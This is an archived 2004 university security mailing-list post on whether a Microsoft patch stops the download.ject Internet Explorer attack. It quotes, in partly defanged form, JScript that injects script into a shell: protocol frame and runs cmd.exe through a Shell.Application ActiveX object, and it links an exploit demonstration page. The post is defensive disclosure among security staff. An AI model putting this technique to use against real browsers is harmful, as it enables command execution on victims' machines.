Educause Security Discussion mailing list archives
Re: critical Microsoft fix for download.ject
From: Gary Flynn <flynngn () JMU EDU>
Date: Fri, 2 Jul 2004 17:12:32 -0400
Jordan Wiens wrote:
For the first public discovery and analysis of the new exploits (by Jelmer; the author who discovered the original adodb.stream issue), see: http://62.131.86.111/analysis.htm
Note that Jelmer just posted the following to the full disclosure mailing list in reference to this "critical update": (don't follow the link with IE) ****************************************************************** Too bad it won't do you one ounce any good http://62.131.86.111gf/security/idiots/malware2k/installer.htm Credit: http-equiv ****************************************************************** gf: Through a series of script calls, it eventually gets to: ******************************************************************** function injectIt() { document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<gfscript language="JScript" DEFER>var obj=new ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c pause");</gfscript>'); } document.writegf('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>'); setTimeout("injectIt()", 1000); ********************************************************************** My limited understanding of the problem makes me suspect that the Shell.Application object is used intead of the ADODB stream object to perform the nasty work after the defect is exploited so don't get comfortable with IE just yet. -- Gary Flynn Security Engineer James Madison University ********** Participation and subscription information for this EDUCAUSE Discussion Group discussion list can be found at http://www.educause.edu/cg/.
Current thread:
- critical Microsoft fix for download.ject Doug Pearson (Jul 02)
- <Possible follow-ups>
- Re: critical Microsoft fix for download.ject Christopher E. Cramer (Jul 02)
- Re: critical Microsoft fix for download.ject Jordan Wiens (Jul 02)
- Re: critical Microsoft fix for download.ject Gary Flynn (Jul 02)